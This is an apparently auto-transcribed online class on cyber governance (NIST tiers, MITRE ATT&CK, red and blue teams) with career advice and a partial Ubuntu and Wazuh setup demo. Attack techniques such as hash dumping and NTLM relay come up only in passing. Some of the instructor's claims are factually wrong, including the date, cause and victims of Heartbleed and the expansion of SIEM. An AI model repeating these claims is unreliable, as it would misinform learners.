I'm studying artificial intelligence.
AI, okay, perfect. And Venki
Yeah.
Sandy, what are you studying, brother? What course are you doing?
Bro, I am studying AI ML, artificial intelligence and machine learning.
Okay, good. Yeah, ML. So,
So you're interested in cybersecurity?
no, it's all good. Let them. Doesn't matter. See, people who did AI ML actually I had like few of the people that worked under me that actually come from the AI ML background, and some of them come from the law background. Some of them worked as GRC consultants, and some of them worked in SOC, and some of them worked as a DevOps. So it doesn't matter the background. And there is a person in hospitality. She worked in uh, financial crimes, and see, it doesn't matter the background these days. It's all about like growing up in a company. It's all about like what do we say? Growing up in a company to on its corporate ladder. And also the main thing I would say is first thing getting a job. Second thing growing up in a company. Doesn't matter what the job is. It must be like a technical job, and then you can like cross skill yourself and move into a cross functional team. But why does it relate to the today's topic, cyber governance? Today's topic is the cyber governance. Why do you think the hierarchy and the things that I'm talking like related to jobs, moving into cross functional teams while working in a certain team is related to cyber governance? And before we start that as well, does anyone know what is the cyber governance here? So what did you guys think of cyber governance?
Governing the cybersecurity,
Governing the cybersecurity. What do you mean by the governing the cybersecurity? Governing
taking
cybersecurity,
control
what
over
does
it,
that mean?
taking control over it
Taking control over it. Okay. How do you take control of it?
by giving commands.
Bro, by giving commands. Perfect. Yeah, usually you can actually do that by giving commands. You can actually run some applications, or you can hack something, or you can predict something, but it doesn't constitute to the whole thing called as a governance. So usually what is a governance? So usually we have a government. Under the government we have like MLAs, MPs and all the other people. But if you take a governance on a company, okay, we'll be having CEOs, CDOs, and then the people with the risk and compliance. So there will be like multiple departments under CEOs and CDOs. There will be business department, financial department, chief business officer, chief operating officer, and then under these guys there will be like other people. So that's called as hierarchy. So implementation of a proper hierarchy is called as governance. So what is a cyber governance? So implementation of proper cybersecurity frameworks, controls, measures is called as a cyber governance. To simplify that. So what do we know about cybersecurity frameworks? So what are the standard frameworks these days? Like most of the companies use NIST, MITRE, MITRE Defend, as well as capability maturity modeling that can be used with other companies as well, not only with the companies that are cybersecurity related, that can be used in a medical field, that can be actually used in a mining industry and other sectors as well. So there are like common frameworks, and then there are like core cybersecurity frameworks. So everything is interrelated here. When you're talking about governance as well, you're talking about the cybersecurity governance on the other hand. So what are the frameworks, and why do we use frameworks to actually keep an organization safe? So does anyone have idea what are the frameworks? Come on guys, hurry. Please raise your hand like if you know any framework or anything. You can actually speak here.
Guys, if anyone are having doubts, you can clear it
Yeah, because
and
see,
just
this
be
this
interactive.
topic, I don't know like why you guys chose this topic. This is because this topic is the ones that are dealt by managers, CEOs, CTOs. Okay, this is actually behind the scope of pen testing as well. It is one of the topics which is behind the scope of pen testing and which is beyond the scope of normal SOC and other people. So usually the people that are working in a company, they usually go for the SOC roles as a entry level roles or like a junior pen tester or a junior networking associate. But people like CEOs, CDOs, and CISOs, they all deal with the cybersecurity governance. So when you're working at the top, you will be only focusing on governance of the company to make sure the company runs its operations smoothly. Okay, the main reason why we implement cyber governance, okay, why we implement a proper framework in a company is because, okay, you don't want any breaches to happen in a company. That's one of the first thing. So usually, like, let's talk about one of the company that I worked in. So when we are considering a company, okay, we need to talk about the people, we need to talk about the strategies the company is following, we need to talk about policies and the procedures. So let us consider a factor called as people. So what does people can do? Okay, what does a people can do? As a people working in an organization, for example, Sankalp is working in INSEC. Okay, so few days, I mean after few days, Sankalp will get an email telling this is your annual bonus and you're getting a Costco gift card. So what does Sankalp think? He's gonna open that and it's gonna cost him a millions of. It's gonna cost him his information and it's gonna cost the company its data, and the hacker who actually sent in that link, you can say phishing link, is actually going to demand some money, so indirectly it's costing me revenue. So the main reason to avoid all this, according to cyber governance, every person within an organization, every person within a tier 4 organization, okay, they will be properly trained and the companies are properly optimized. So what is tier 4? Okay, I'm speaking about something called as a tier 4. So according to NIST framework, okay, we have a standard framework for this to follow governance. According to NIST framework, there are like 4 levels. In the very first level, okay, the company has just started. Like for example, let us consider INSEC. INSEC is a small company. Me and Sankalp just started, and we have our hierarchy established, and we just started using some SOC tools like Vazuha to do some threat monitoring. Okay, that is our very first stage. We are in the very first stage of governance. So the very first stage of governance is you started your company, you implemented some security controls like some SOC tools to monitor your organization, to monitor your mobiles, and we have one of our system administrator forward. He actually monitors if there is any threat. Okay, and when we move on to the second stage, okay, forward will be like, for example, forward will be actually actively threat monitoring. He will be getting some patterns of the previous threats and he will be actually implementing them. And also we have like a bit of other hierarchy as well. Under Sankalp there are like other 3 people, and under Srivardhan we have like other 3 people. So then we actually monitor their systems as well. I mean, we are not sneaking into their systems, but we keep their systems monitored for any threats or alerts that actually cause breach in this particular organization. And when we go into the threat, when we go into the level 3, okay, so we are going to deal with policies. Okay, we are going to implement the policies, procedures, and we're going to set up some identity access and identity management. So for example, Sankal will be only having access to particular devices, and Forward is the one that is going to have access to all the devices because he's the admin. And then there is Srivardhan. He will be having only access to the content management. So then there is like a set of rules and regulations that happen to be created by me that I will be implementing on my organization. That is the level 3. And what is level 4? Level 4 is when, okay, you are going to continuously optimize. So everything is implemented. The only focus right now is to optimize based on the new alerts of the other organization. For example, there is a rival organization that we had, and they had a security breach, and then we found out why that security breach happened. And then what we're going to do is we're going to actually consider that pattern, and we are going to consider that how this hack happened, and we're going to actually plug it to our IDS. So it's going to actually detect if there is anything like that. We are going to actually monitor that kind of pulses. So what exactly is a pulse that I'm talking? Like a pattern. Like for example, when a hacker wants to actually hack one of my organization, he's going to actually search for active directories. So threat hunting, okay. So usually what we are doing is we are actually monitoring if anyone is actually searching for our active directories, if anyone is actually pinging our computers. So we are actually continuously monitoring the threats before any damage is happened. So that is a level 5 of an organization. Sorry, a level 4 of an organization. In a level 4 organization, everything is properly implemented, and we are actively looking for threats, we are actively searching for risk, we are validating risk, and we are uh, patching the risk, patching the vulnerabilities every day and every second. So that is a level 4 organization according to a cybersecurity framework. So usually most of the top level companies are in level 4, and usually there are like startup companies that they might have like some um, they might be in tier 1 or tier 2. Okay, for example, let us consider they are in tier 1. Okay, and if it is in a tier 1, okay, there is a thing called as active directory, which is one of the most popular term. That is one of the thing I'm planning to explain today if I have more time. But so in a tier 1 organization there are like 10 employees, and let us consider INSEC itself. Okay, INSEC has 10 employees right now, and we have like a tool installed Wazuha to monitor the systems, company systems. Okay, and what's going to happen is, for example, let us consider we have one of the port open. Okay, according to the I'll talk about that one later. For example, let us consider we have one of the port open that actually leads to the temp directory. You can actually upload the files. Okay, so when the ports are open, a hacker can get into the system, even though it's an active directory or something. Okay, so once he gets into my system, he can do some lateral movements, and he can actually steal the credentials. He can actually get his tools inside that. For example, there is a tool called as hyena. Using that tool, you can actually get access to everything. Like you can actually read his password, you can actually change his details and everything. So let us see how that tool works in action as well. I'm going to show the tool just before we start. I'm actually opening one of my 2025 Windows server, and I'll show you the tool how it works. So there are like some powerful tools a hacker can actually use to actually manipulate the registry keys, and he can actually dump the hashes. There are like a lot of attacks which you don't even understand right now. They are like behind the scope of like people who are like just getting started in cybersecurity. You need to have like at least like 4 to 5 years of experience when you're working in a pen testing field to replicate a certain level of attack. So usually I'm gonna teach you how to get there as well. But down the line, let's actually see what a hacker can see once he actually sends in a tool. Right now, let's actually get into my server. It's going to take a while for this one to be open. So there is a tool called as Aina, which a hacker can actually send it to the temp directory, and he doesn't even need any license. So for example, okay, once the hacker gets into your system, so what's going to happen? He can get access to other systems as well using this powerful tool. So once he clicks on enterprise, he can check for the other systems as well. I think this system is down, so it's not going to show that because that system is inactive. But for example, let us consider this current computer. You can check the user rights and what is a token privilege, symbolic linking. Okay, Symbolic linking is linking a file. Okay, do not worry about that. These are some of the advanced things that you can actually learn down the line. Okay, right now these are something complex for everyone to understand. And for example, you can see remote shutdown privilege. So there is a company called as Axis or something where they happen to send in the hyena tool to steal the permissions of this and to check who has the permissions for this. Okay, for this there is an administrator permission. If one of the permission is misconfigured, for example, let us say everyone has this permission, I happen to add everyone to this permission. So what will happen? So in that particular company, everyone can actually access the computers remotely. So it means that in my company, I can actually access Sankalp's computer remotely. So if the attack happens to be done on Sankalp's computer, the hacker can actually move into my computer remotely. Okay, if my computer is turned on. So it means that whole organization is completely compromised. So to prevent all these zero-day attacks or to prevent a loss in a certain organization, we have a thing called as cybersecurity frameworks and a proper governance. So if the company is in tier 3, okay, then the proper permissions will be set up. So which means that as a system administrator or a security engineer, or as a security engineer or as a security architect like myself, I will go through every single thing to see if there is any faulty permissions, and then I'm going to remove everything. And then I'll be like segregating the duties. So you must have heard this term like segregation of duties. So what I would be doing is I'll be like giving a least privilege access to whoever needs the least privilege. Whoever needs the highest privilege, he is going to get that privilege. So it means that you are going to set some privileges based on the role. Is the reason we have a hierarchy and governance. So for example, if we take a constable, when you take a police station, he's going to have access to some of the things. But when you take a IPS officer, he's going to have access to some of the other things as well that constable doesn't have access to. So it's just same thing, like when we are taking a governance. But here the most important thing is you need to focus on cybersecurity when you're taking cyber governance into consideration. How your cybersecurity is evolved, is your cybersecurity posture in an organization is correct. So those things you will be dealing with when you're working in a corporate company. For example, let me actually power this off. We'll see some of the threat stimulations, like what is going to happen. So most of the people might have heard about some of the frameworks called as MITRE. Okay. So usually MITRE is a non-profit organization and they actually work for USA, the federal government. They created this framework. Okay. So why did they create this framework? Okay. Let's place this framework aside. Okay. Before we talk about this framework, let us talk about a proper security operations center. So in a proper security operations center, we have like both red and blue teaming. In both teams, you have like tier 1, tier 2, and tier 3. Easy. So in each team, okay, there are like defensive roles and offensive roles. So for example, okay, let us take these guys, the red teamers. Let us talk about red teaming today, okay? Blue teaming is most boring because all they do is read logs and update those stuff. I mean, most of the people might think like that, but once you learn what blue teaming is, it's a different story. It's actually blue teaming is the most interesting thing. You guys will understand once you are in a SOC role in future. You might be, who knows? But let's talk about red teaming for a while. So what does a red teamer does? So usually most of you guys think like red teaming and pentesting is same. No. It's not same. Red teaming is completely different from pentesting. They are the ones that do the adversary stimulation. They are the ones, okay, that thinks like a hacker to hack their own organization, okay, by following a proper framework, okay. So usually like usually it's like a white box testing when you're having a knowledge on framework. Okay, white box testing means you're having a knowledge on something before you test. Black box means you don't have any knowledge before you test. Okay, so as a pen tester, you might have a knowledge, and this is the scope, you need to test a certain department. But when you're working in a red teaming, okay, so you're gonna test your own systems. For example, I want to migrate all my Google accounts to Windows, okay, and I want to set up Active Directories. So what I'll be doing is I'm gonna migrate all of my Windows machines, sorry, Google machines that are on Google Cloud to Windows Active Directory. So what's gonna happen there, okay? So when I migrate there, I need to set up some policies, IAM, IPM, and all. Like I'll show my Google Cloud Console here. So this is a different story. Let me. Hmm, do I remember my password? God knows, but let's leave it like that. But yeah, so when you're actually going into a cloud machine, when you're doing some migrations from one computer to another computer, or from one site to another site, like a physical location as well, you need to think like a hacker. What can hacker do? What can hacker find out? So for example, you're leaving some footprinting, okay? If you're leaving some if you leave some footprints, so what is a footprint? The things that you do online. For example, Sankalp is one of the employee and he's gonna say, he's gonna post, he's gonna take a selfie and he's gonna say, hey bro, we are actually migrating our, server form, and what we and what can we do? And he's gonna take a picture of new server form and he's gonna post it on Facebook. So what will happen there? So the hacker, the people who actually saw that photo, they might actually want to hack Sankalp. They want to hack Sankalp. So they're gonna search for the details. The first thing they're gonna do is a bit of reconnaissance, and there are like couple of techniques here, okay? And then they're gonna search some cloud-based sources, okay? So if they are searching for some cloud-based sources, it means that Sankalp happened to upload something in the cloud or something online. So those are the things that might happen. And for example, like you can see there is something that happened, like an example, you can see this framework example as well. Exotic Lily has searched for information on target individuals on business databases including Rocket Search and Crunchbase. So these are all some of the things that can actually people search for, like hacker forums or something like that. And usually there are some mitigations that are provided. So as a red teamer, you will be actually replicating those attacks what a hacker does, okay? So it means that you're actually stimulating the threats and you're actually emulating the adversary. So you're going to actually like act as a real hacker and you're going to like try to compromise the system, okay? These are all the, so you will be using like a proper framework like MITRE, like you're going to actually use MITRE framework in real life. So you will be like following a proper steps, like for example, there is a security architect, he's going to say, hey bro, there are chances that it might be our system is vulnerable to like some of the privilege escalation tactics like token manipulation or like create or modify system processes. So what are you gonna do as a red teamer? You're gonna actually test them and then see like, okay, what are the mitigations that I can implement. From here you're gonna like tell about some of the mitigations here. Every mitigation has a code and you're gonna send these codes to the blue team. Okay, then the blue teamer or the developers, they're gonna actually fix that and they're gonna send it back to the security architect, and then is going to actually send it to the red teamer to see if it is actually still working. So that's how an organization patches their vulnerabilities if it is a top level organization. So they have a proper security operations that are running in an organization and they're like continually searching for threats. So few years ago, like back in 22, there is a vulnerability from a heartbleed bug, okay? So using that vulnerability, people happen to get access to Telstra accounts. See, so how it happened? It's a heartbleed bug, and why did it happen? It is through SQL. So then most of the other companies that got the alert, they happen to patch their SQL servers. See, you can actually learn from the previous mistakes of other companies, and you can actually implement it in your own company to optimize them. So these are some of the things that you can do. Okay. So this is called as a governance on the whole. I'm not actually going in deep because see, if I go in deep, you guys cannot even understand. So I'll tell you some of the basic processes of a cyber governance. So what we actually do. Let me open up my other screen. Anyone have any doubts until now? Guys, please kindly raise your hands. This is one of the topics. This is one of the topic that everyone can understand, but it is actually hard to implement. Anyone having any doubts? Anyone having any doubts? You guys can kindly raise your hands. No, sir. Giri Katti Shihiri. Perfect. So usually, like when we take a proper cybersecurity framework, okay, we have like a proper functions. Okay, governing the risk, identifying the risk, protecting the assets, detecting the risk, and responding to the risk, and recovering from the disaster. Or else, you can actually implement some of the previous recovery plans. So these are part of the cybersecurity framework implemented by NIST. Okay, this is one of the framework that is being used till today. Okay, NIST CSF 2.0. This is one of the framework that is being used till today. Okay, to secure a lot of organizations. So I'll tell you some of the important things. So you do not even need to worry about this. What exactly? So everything is gonna work. So usually, okay, when we take governing, okay, so according to governance, okay, so what are the things that I can implement? Okay, so I can actually implement some of the risk management strategies. I can actually segregate the roles and responsibilities, and then I can implement policies and oversight. Okay, oversight means learning from the past mistakes of another company. Okay, that is being dealt by a proper risk management team, and then identifying the risks. Okay, every risk in a company is rated. Okay, there are like some kinds of risks within a company: a risk that you can accept, a risk that needs to be mitigated, a risk that should not even come, but if that is a risk, it's going to cause you, if that kind of risk comes down, it's going to cause you a severe breach or a 0-day attack. And then protecting them. So how are you going to do that? So identity management, authentication, and like for example, if one of your employees are like unaware of certain stuff, you're gonna train them, training and awareness, and you're gonna implement a proper IDS, IPS, and proper policies. So that is to protect and detect. How are you going to detect? You're going to actively monitor for risks using Wireshark and other stuff, and responding to the risk and recovering from the risk. So these are all the things that are being dealt by cybersecurity governance. So when we take this, okay, this is just a simple thing. But when you cover this thing in depth, even for a governance, everything has a proper code. Okay, GV0C01. This is one of a code when you take organizational context. Okay, for example, and we not only have GV0C01, there are like lot of them, GVRR01. So when you are working in a professional environment, okay, you will be like getting these terms a lot. So what you need to do, you can simply look at that. Okay, this is the thing I need to implement. Okay, this is the thing I need to govern. This is the thing that I need to recover. This is the thing that I need to implement as a disaster recovery plan for an organization. So it talks about a pure cybersecurity in terms of a hierarchy and governance. So this is how exactly this thing is going to happen. And something related to supply chain, vendors and all. So for example, supply chain, what can be a supply chain here? For example, I ordered like 10 laptops recently for my company, and I bought it from a certain vendor. Who knows those, those laptops can be bugged, or these laptops might have a previously installed malware. So you need to like think really, really deep when you're like, considering a proper governance. See, every organization needs to follow this. Okay, these are like, these things actually like go into like really, really cores and depths of cybersecurity, and then you can actually protect a proper organization. Okay, this is not a easy thing like implementing a governance on a particular organization. So these are all the things you need to consider. There are something like access controls as well. These are usually the controls that you can implement. So these are the controls of NIST, and there is another framework. So this is the one that we talked about: tier 1, tier 2, tier 3, and tier 4 according to the NIST. So usually, like, you need to consider risk governance and risk management as well. So it's not about like governing the risk. It's about like managing and mitigating as well at the end of the day. You don't want to keep the risk all day, okay? When you have time, you need to patch it, or else it might lead to zero-day vulnerabilities. If you're not aware of your risk, that's going to be a problem as well. You need to learn from the other companies or like other incidents, and you need to implement in a proper company. So people these days want to do a lot of startups, but people do not even know like what can happen these days. There are like people like, like there are like literally hackers that want to like, damage the company. All their intent is to do some damage, and we do not even know their capability. Okay, what can this person do? But we might, once we are aware of the threat, okay, we know there is a threat, we know there is a risk, but we do not know the capability of the hacker. He might be a really good one like Sankalp. He can be like a top-notch person like Fawad. He can actually break into system and mess up with the active directories using NTLM relay attacks. So there are like a lot of things when you're considering hacking or like cyber security. So here we are like talking about protecting an organization using governance and its frameworks. So this is one of the most interesting thing when you take um, when you take a whole organization, and also one of the most easiest to roll, and also one of the most high paying roles that you can earn from this cyber governance as a GRC consultant. Governance, risk and compliance. As a GRC consultant, you can get paid up to like 170 grand as a starting, like what I did. So the last role I worked in risk and compliance, literally I got paid like super good money. And all I have to do is just simply report it. I worked for 3 hours out of 8 hours, and rest of the time I'm chilling out, and I'm getting paid a lot of money while working as a risk and compliance. Before that, I worked in SOC, tier 1, tier 2, and then I worked as an architect. So these are all some of the things that you can do, like when you get into a proper company. But my entry level role is not related to cybersecurity. Okay, I worked as a technical specialist, which is my entry level role, and before that, I worked in blockchain mining. So there are like other roles that I worked in before I moved into cybersecurity. So I don't know who are in fourth year here. Before we do something, like, I know this is most boring, so I want to teach you some pen testing today. If you guys are ready, who are interested in some pen testing? Come on, you guys said the most boring thing from my mouth today. Because see, this is one of the important things. Fawaz, Sidhu Avla, Dhanush, they are like people interested in pen testing. Nice, good thing, good thing. So let us consider a scenario here. Okay, who wants to do bulldog? Whose favorite mission is bulldog? I'm just curious. Who loves bulldog? Bulldog mission. Are any of the students, okay, who has VirtualBox and Kali Linux installed? I'm happy to actually like um, I'm actually happy to like show it from your own systems. I'm happy to like give you that hands-on experience while I'm going to tell you each and every step what you guys need to do as a red teamer, and how can you actually exploit a system by using a set level of tactics, and how can you prevent them in every single step. So we're going to deal with that as well. Okay,
Yeah, VMware is also okay. And guys, if you're in a comfortable position, please turn on your cameras and be interactive so that the session looks good and it goes well. You're having Ubuntu. So guys, can you all guys once again raise your hands who are having Linux or VMware or VirtualBox in your systems? Nitish, Komat Reddy, Nikita. Okay, so who wanna volunteer now?
Arey, wait, someone said they have Ubuntu. Like, can you please raise your hand? Sidhu Avula. Arey, can you
It's
turn on your
Sidhu.
camera and raise your hand, please? Because see, I want to like show something that you can actually do to do some threat monitoring right now itself. Can you like kindly turn on your camera, brother? Sidhu, nice, good to see you. So, you want to play some security operations in your home. So, do you have like multiple computers? Sidhu Aula, do you have like multiple
You're mute. You're mute, Sidhu.
For
You can
example,
unmute
Sidhu, I'll
yourself.
tell you something here, okay? You are
I
like,
have single I have single computer, sir.
doesn't matter, bro. You can actually install that agent in my system and you can actually monitor some threats in my system. Those are the things that you can actually do from your computer. You know that? So I'll teach you one of the tool called as Wazuha right now for you guys as well. Like it's a, we're gonna do some security operations and then some pen testing because usually like most of the people doesn't have Ubuntu. Okay, can you like screen share your Ubuntu kindly? We're gonna start this thing with some security operations today.
Yeah, wait.
So, what do you guys know about SOC and SIEM, System Information and Event Management? SOC అంటే ఏంటి, సిస్టమ్ ఇన్ఫర్మేషన్ అండ్ ఈవెంట్ మేనేజ్మెంట్ అంటే ఏంటిది? అరే ఏమనుకుంటారా అంటే సాక్ అంటే బ్లూ టీమ్, ఏం లేదు సింపుల్గా లాగ్స్ చదువుతారని అనుకుంటారు. ఓకే, ఇట్స్ నాట్ లైక్ దట్. సాక్ మీన్స్ ఓకే, you're having both red and blue teaming. So we talked about red teaming now. Let us see what blue teaming does now. Okay. So blue teaming are the ones that do the threat monitoring. So Sidhu is gonna actually like open his Ubuntu and he's gonna install a tool called as Wazuha just with a single command. He doesn't need much commands. Like one single command, you can install that SIEM tool and you can connect to the local host and you can start monitoring the beautiful threats. How are you gonna do that? One single command, easy. It doesn't need much. So, Sidhu, can you screen share if possible? I think he's missing in action. Hmm. It's all good. Let us see if I have my Ubuntu ISO so I can like show the installation from the beginning. And then we're gonna do some pen testing as well. Sidhu, perfect. And now, how are you gonna install Wazuha? Wazoo, WZHU, Wazoo. Simple. Go to the Wazoo documentation.
Where it is, sir?
I'm gonna send you a simple command, brother. You don't even need to type anything. One single command and done. That's it. If you type that command, you can that's it. You do not even need much of this stuff. So you're actually like curling that package. Okay, you're curling the tool and you're installing on a shell. Okay.
How it is do, sir?
So when you are curling, it means curl is a command. Okay, it's gonna grab the whole package or like the whole tool, and
Yeah.
then it's gonna download that into your system, and then you're actually using the sudo command. Okay, sudo bash. It means that you're actually trying to execute that. So you're doing both of the things. So once this is done, you're installing the other one. And double and is a one of the operator in the Linux. So one after the another. Like you're doing this command and then you're doing another command. So that's how it's gonna work. And once you install the Wazuha, that's it. Just simply type in the command and press enter. That's it. So people will think you need like a lot of knowledge, like you need to like download an ISO for this one separately, or you need to like register or log on. You do not even need anything. Sidhu, can you screen share? I think ignore him, ignore him. Let me do that. Let me see if I have a Ubuntu ISO. If I do not have an ISO, we'll try to install that in a different operating system like Kali. So usually this is installed in a Linux. So that's one of the main reason we need a Linux for this one. ISOs. Yes, perfect. We have a Ubuntu. Let me screen share. we have like a Ubuntu and couple of Active Directories that happen to be set up in my system. So this is one of the things. Simple. Simply copy paste the command and done and dusted. But before that, I'll teach you how to install Ubuntu or any Linux within Linux ISO in a system. So you need to have VirtualBox, okay? Where you can download the VirtualBox. Let us see where we can download that. Simply type VirtualBox download. Easy. Once you like search for that, click on the very first link, and depends on your operating system. Depending on that, click on Windows. That's it. It's gonna get downloaded. So just click on download unverified file and done and dusted. So I don't need that one now. So click on new. Okay. Just name it as Ubuntu and ISO image. We're gonna select that later. Now let's select it right now. So you need to know where exactly this one is located. I have like a lot of them. So I'm gonna click on Ubuntu, done and dusted, and I can click on skip unattended installation or something like that. So I'm gonna skip that, and always try to do this. Okay, I'll tell you why, because you need to configure everything. Click on next. Give at least 4 gigs of RAM and give 2 processors on the minimum. I'll just give 2. You do not even need 3. Click on next. Create a virtual hard disk. Click on next. Finish. That's it. So right click the created one. Go to the settings. The very first thing I want you guys to select is, so you're actually selecting it from a ISO file. ISO files are the ones back in like 2000s and 2004s. Those files are the ones that we are burning it to a CD. So it means that CD is an optical disk. So you're gonna uncheck the floppy and you're gonna load it from a optical disk. And in display, you just cross check everything. Doesn't matter. Network must be on a bridged adapter. So what do you mean by bridged adapter? Okay, I'll tell you something. If you go onto the network connections in a computer, so what is your Wi-Fi? You will see Wi-Fi. So under the Wi-Fi, there is something called as a killer Wi-Fi 6EAX, something like that. That is your adapter. You need to select that particular adapter, and you're gonna select the killer or Wi-Fi. It means that this virtual box, okay, this virtual box will be assigned a DNS to the subnet of my router's gateway. For example, if my router's IP is 192.168.20.1, then Ubuntu's IP is going to be like something 192.168.20.10, 11, 12 or something like that. Okay, so that's how it's going to work when you set everything in bridged environment, or when it is like a subnet, when it belongs to the subnet of a router. And then click on start. Simple, easy, done and dusted. Let it get powered up, and then we're gonna open that, and after that we're gonna do some pen testing. And anyone having any doubts related to cybersecurity, anything is welcomed here. Ubuntu, safe graphics. Try or install Ubuntu. Click on that. That's it. Doesn't matter if it is safe graphics or something like that. Click on that. Or else, if it doesn't work, we'll do a unattended installation. Let it get installed. Let it get installed. It's gonna take a while to this one to show up. Yes, it's loading. So Ubuntu means canonical. The company is canonical, and there are like some really good entry level canonical jobs. And if you are good at mathematics, they're gonna hire you. I'm not joking. Um, Recently, one of my students got a job in canonical, and they're getting paid up to like 110 grand for a technical support in level 3. So trust me, Canonical is a top company like Microsoft. So Microsoft deals with Windows, right? Canonical is the one that deals with the Ubuntu and all. So that's it, done and dusted. Welcome to Ubuntu. It's going to prepare it for you here. One of the most beautiful operating systems. We're going to have some good music. Click on English. You don't want some Spanish, Espelano. And click on next. It's working. Used wired connections. Next. Install Ubuntu. Try Ubuntu. Now we are just installing, okay? Interactive installation. Default selection. Now you can select download and install media install download and install support for additional media formats like including but not limited to MP3, MOV, install third-party software for graphics and Wi-Fi hardware. You can, you have to, it's better you check them, okay? You don't want any, thing to mess up. So why not? Erase disk and install Ubuntu. That's it. Create a name. Weak password, doesn't matter. Right now, I don't have any time to create a strong password. I'm really bad at typing my password. That's it. Okay. Use Active Directory. Okay, bro, that's a thing you do not even want to check because you don't have any Active Directory. So I live in Australia. Perfect. Melbourne. Done and dusted. Install. That's it. Easy. It's gonna take a while. So Ubuntu is one of the, you know, most beautiful operating system and one of the best operating system. You can actually make your Ubuntu powerful like Kali by simply installing Kali tools on Ubuntu because Ubuntu is more user friendly and you can actually download a lot of stuff. You can even play games as well. Okay. There is a operating system. If there are any beautiful gamers here, there is Spotify, Telegram. You can see like Ubuntu is really good. So I happen to install Ubuntu LTS. So with Ubuntu LTS, you're gonna get updates for like next 10 years. So the very first thing you need to install Wazuha is an Ubuntu. Before that, you need to update Ubuntu, and then you need to specify some of the commands. But in the meantime, okay, while this thing is installing, I want you guys to be a bit interactive because I want you guys to like ask me regarding your career and what you want to do in cybersecurity. Anything I can actually answer right now within this time. What do you guys want to become, and how can you do that? So because see, without a goal, it's going to be really hard. The very first thing I'm going to tell for everyone is see, set a proper goal. This is a specific cybersecurity job I want, okay? And then you need to like work hard for that. Cybersecurity jobs are not easy, and most of the time, I mean, most of these days, what's happening is people are not, you know, um, people are not that actively hiring for you know mainly like what do you say, like people are not hiring any people from other backgrounds into cybersecurity, like I mean okay, electronicals, computers, IT, mechanical is okay, but not like hospitality and law background. So previously people happen to hire those backgrounds as well. Nowadays now, see, it's even good for gaming. Ubuntu, one of the best operating systems. Let us install the tool and see what we can do. And anyone having any career related doubts and what do you want to do? Anyone who is a working professional who wants to grow, and anyone, come on guys. If you do not have doubts, first thing I mean, okay, it means that you are like highly skillful or something, or else I cannot say anything. You can raise your hands and you can ask me openly. Nikhil Sai, Deepali, Apple, Anas, Abhilash Reddy. Evalki doubts levo. Q card. Doubts? Any doubts, Q card? Nitish, come on, bro. Speak. Any doubt?
Good evening, Anna.
Yes, bro.
Particularly, I have a doubt that what will be the job opportunities in the field of information security?
Job opportunities. Information
Like
security means. Okay, come on.
how it would be a career if we opt information security as it may be a master's course or it may be an etc. MTech course like.
Okay, I'll tell you something, brother. Nitish, see, as of
Yes,
now, this is one of the serious advice I want to give for everyone.
yes,
Do not do masters or MTech. It's pointless. I'll tell you why. Because see, people these days are looking for work experience or intern experience. Okay,
okay,
write this down, everyone, because see, this is one of the most important thing. The very first thing is intern experience and the skills and a proper tailored resume. And bro, trust me, if you're applying for the jobs that are outside your university, please do not
Okay.
even mention your GPA. No one's gonna actually see that. Okay. Are Sankal, do you have my resume? Can you send it to me? I don't even have it in my computer. That's funniest thing. Really funny. I'll show you my resume. If you see my resume, you'll understand like what
Sure.
jobs I did and how can you actually, what are the skills that you need to put in. So for every company, okay, for every different company that you're applying for, you need to, you know, tailor the resume that that actually meets the requirements of that company, and so that it's not going to be like putting it's not going to go in trash by an ATS, automatic tracking system. On the other hand, you need
Yes.
to always okay, provide a proper cover
Yes.
letter addressing the key selection criteria.
Okay.
So what is the key selection criteria? So there are some factors that you're really good at, and tell them why are you good at and what you did from your past experience. Those are all the highlights that you're going to write in your cover letter, and this is the reason you need to hire me. So you need to mention them in like 1, 2, 3, 4 or 5 formats. You need to mention like at least 5 key selection criteria. Okay. And then you can
Okay.
actually like um you need to like see, you need to like mention the key selection criteria that is common for you and that company. I mean, they will be like mentioning this is what kind of person I'm looking for: a person with a can-do attitude, a person who is skilled with Sentinel, a person who is having a good knowledge and SOC, a person who is having at least 3 years experience on something. Okay. For example,
Okay.
you actually had 2 years experience and they're asking you for 3 years. Doesn't matter, still apply. I got the job like that itself. They asked for 5 years. I only had like 2 years experience, but I still got the job. It means that my resume is properly formatted and had a proper key selection criteria included and all. Bro, I'm like 26, bro. I'm not like 35 or something to bro, people in I'm the youngest security architect in my whole team. And also I'm the youngest SOC
Yes.
analyst in my whole team. While I'm working for the MUFG, and also while I'm working for a NAB, and while I'm working for Raytheon and all.
Okay.
SOC analyst, what will you suggest for that? I'm CS major but seeking an internship. I did try Elasticsearch as an SIEM and Splunk, and it's a homelash project. But again, the actual skills, you can only get them on actual internship or job. I'm not sure. What do you mean, like Carody Hams? Can you like speak up? I'm a CS major but seeking an internship in that. Okay, dude. Okay, first thing, many of the companies that do not open SOC internships. Okay, there is no proper internship for SOC. Okay, there might be an internship for cybersecurity analyst or a cybersecurity specialist, but usually no, there won't be any internship for SOC, because I'll tell you how hiring is happening these days. So these days, what is happening is, okay, if you are a developer or like a guy working in a technical field. అరే ఇప్పుడు నా రెజ్యూమ్ అవసరమా దాని తర్వాత ఆపు క్లోజ్ చేయి. అరే సంకల్ మూసేరా దాన్ని. అవు చెప్తున్నా కదా, ఇఫ్ యూఆర్ వర్కింగ్ ఇన్ ఎ టెక్నికల్ ఫీల్డ్, ఓకే, most of these days it's actually hard for a newcomer. As a entry level guy, you need to have a lot of things on your resume, like a proper certifications, mainly a proper work experience and a proper set of skills regarding that job. Then that's it, you're gonna get that job easy. But when you are like when you want to go into SOC roles, or when you want to go into a cybersecurity role working as a technical specialist, simple thing: speak to your manager or HR and ask them, hey bro, I want to get into that role, that is my future. That's how I see the future with my company, with your company. So usually, like when you're working in a company, you will be like in touch with your manager or a HR, and you will be like speaking to them. They will be asking your like, what do you want to do down the line? So you need to tell that I want to work in this field or that field, and then you can get a proper cybersecurity certification. So usually I never did any of my certifications before except for CEH and VoiceCP. Those are the two things I did just for fun. If you want to get good at cybersecurity, bro, cybersecurity is evolving every day, Sidhu. Okay, how can you be good at something that is evolving every day at a exponential rate? Within this 1 hour that we talked, there might be like literally 326 attacks all over the globe and 5000 threat factors at least. See, things happen during a set amount of interval. So how can you be good at something that is, you know, going on that gradually? So what I would suggest is, okay, it depends on what you want to become. If you want to become a guy that works in a blue team, I would say like, practice more of log analysis. Okay, try setting up some of the tools like the ones that I'm doing here right now. It's taking a lot of time. I don't know, for some reason it usually doesn't take much time because it might be because of my internet, but apart from that, when you want to become a red teamer or pen tester, I want you guys to like practice a lot of pen testing and all. See, pen testing is really good. Like, I actually train my team every Sunday or like every Saturday. I'll bring a new machine and tell them, 